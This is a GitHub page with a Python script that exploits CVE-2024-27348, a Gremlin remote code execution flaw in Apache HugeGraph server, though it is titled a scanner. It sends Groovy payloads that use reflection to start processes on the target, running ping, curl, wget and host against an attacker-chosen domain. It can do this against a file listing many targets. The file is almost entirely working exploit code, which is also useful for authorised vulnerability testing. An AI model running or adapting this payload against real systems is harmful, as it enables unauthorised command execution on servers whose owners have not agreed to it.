-
Notifications
You must be signed in to change notification settings - Fork 15
/
Copy pathCVE-2024-27348_Scanner.py
97 lines (86 loc) · 6.96 KB
/
CVE-2024-27348_Scanner.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
import requests
import argparse
import json
def exploit(target, port, domain):
url = f"{target}:{port}/gremlin"
headers = {
"Content-Type": "application/json"
}
ping_payload = {
"gremlin": f"Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"SL7\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"ping\", \"{domain}\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);",
"bindings": {},
"language": "gremlin-groovy",
"aliases": {}
}
curl_payload = {
"gremlin": f"Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"SL7\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"curl\", \"{domain}\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);",
"bindings": {},
"language": "gremlin-groovy",
"aliases": {}
}
wget_payload = {
"gremlin": f"Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"SL7\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"wget\", \"{domain}\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);",
"bindings": {},
"language": "gremlin-groovy",
"aliases": {}
}
host_payload = {
"gremlin": f"Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"SL7\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"host\", \"{domain}\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);",
"bindings": {},
"language": "gremlin-groovy",
"aliases": {}
}
try:
response = requests.post(url, headers=headers, data=json.dumps(ping_payload), verify=False, timeout=10)
if response.status_code == 200 or "\"code\":200" in response.text:
print(f"[+] {target}:{port} is vulnerable!")
print("[+] Ping command Response data:")
print(response.text)
response = requests.post(url, headers=headers, data=json.dumps(curl_payload), verify=False, timeout=10)
print("[+] Curl command Response data:")
print(response.text)
response = requests.post(url, headers=headers, data=json.dumps(wget_payload), verify=False, timeout=10)
print("[+] Wget command Response data:")
print(response.text)
response = requests.post(url, headers=headers, data=json.dumps(host_payload), verify=False, timeout=10)
print("[+] Host command Response data:")
print(response.text)
print("")
else:
print(f"[-] Request failed with status code: {response.status_code}")
print(f"[-] {target}:{port} may not be vulnerable")
print(response.text)
print("")
except Exception as e:
print(f"[!] There is Exception with {target}:{port}")
def process_targets(file, domain):
with open(file, 'r') as f:
for line in f:
target, port = line.strip().split(',')
exploit(target, port, domain)
if __name__ == "__main__":
print("""
██████ ██ ██ ███████ ██████ ██████ ██████ ██ ██ ██████ ███████ ██████ ██ ██ █████
██ ██ ██ ██ ██ ██ ████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
██ ██ ██ █████ █████ █████ ██ ██ ██ █████ ███████ █████ █████ ██ █████ ███████ █████
██ ██ ██ ██ ██ ████ ██ ██ ██ ██ ██ ██ ██ ██ ██
██████ ████ ███████ ███████ ██████ ███████ ██ ███████ ██ ██████ ██ █████
Apache HugeGraph server RCE Scanner
By: Zeyad Azima
Github: https://github.com/Zeyad-Azima
""")
parser = argparse.ArgumentParser(
description="Exploit CVE-2024-27348 Gremlin RCE in HugeGraph server from 1.0.0 Before 1.3.0")
parser.add_argument("--file", "-f", required=False,
help="File containing target addresses and ports W/ the following format:\nhttp://target,port\ne.x: http://localhost,8080")
parser.add_argument("--target", "-t", required=False, help="Target IP address/domain")
parser.add_argument("--port", "-p", required=False, help="Target port")
parser.add_argument("--domain", "-d", required=False,
help="Attacker domain (Your own domain to check ping/requests log)")
args = parser.parse_args()
if args.file and args.domain:
process_targets(args.file, args.domain)
elif args.target and args.port and args.domain:
exploit(args.target, args.port, args.domain)
else:
print("[!] Please Use targets file or a single target\nuse --help/-h for more information")